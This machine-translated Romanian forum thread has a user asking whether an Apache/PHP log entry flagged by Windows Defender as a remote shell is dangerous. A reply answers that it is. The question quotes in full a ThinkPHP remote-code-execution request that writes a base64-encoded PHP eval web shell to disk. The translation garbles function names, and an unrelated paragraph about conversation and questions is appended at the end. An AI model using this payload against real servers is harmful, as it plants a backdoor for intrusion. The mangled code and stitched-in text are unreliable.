Puncte:0

Apache 2.4.51 Apărare URL

drapel id

Rulez Apache 2.4.51 cu PHP 8.1.0 pe un PC cu Windows 10. Recent, am observat câteva intrări în jurnalul meu și alertele corespunzătoare din Windows Defender. Un exemplu de vinovat care provoacă o alertă AV este https://jacobsm.com/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27fuck%27]);&fuck=fputs(fopen (decodificare_bază64(eC5waHA),w),decodare_bază64(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs)); care oferă un cod 200 ca răspuns și o alertă de la Windows Defender Ușă din spate: PHP/Remoteshell.B. Defender afirmă, de asemenea, că Statusul a eșuat și că este posibil să nu fi fost complet remediat. Fișierul afectat este fișierul jurnal Apache, deci nu îl poate pune în carantină deoarece este utilizat de Apache. Bănuiesc că este îngrijorat că fișierul poate fi interpretat de procesorul PHP (deși nu va fi niciodată). Ar trebui să fiu îngrijorat?

drapel in
Da ar trebui. Fie PC-ul dvs. Windows este expus direct la internet, fie aveți malware în roaming în LAN. Ambele sunt probleme care ar trebui abordate.
drapel id
Bine, am eliminat PHP din stivă și am folosit tehnici alternative pentru a obține ceea ce am primit cu PHP. Ar trebui să fiu în siguranță acum doar cu Apache 2.4.51 rulând, sigur?!?

Postează un răspuns

Majoritatea oamenilor nu înțeleg că a pune multe întrebări deblochează învățarea și îmbunătățește legătura interpersonală. În studiile lui Alison, de exemplu, deși oamenii își puteau aminti cu exactitate câte întrebări au fost puse în conversațiile lor, ei nu au intuit legătura dintre întrebări și apreciere. În patru studii, în care participanții au fost implicați în conversații ei înșiși sau au citit transcrieri ale conversațiilor altora, oamenii au avut tendința să nu realizeze că întrebarea ar influența – sau ar fi influențat – nivelul de prietenie dintre conversatori.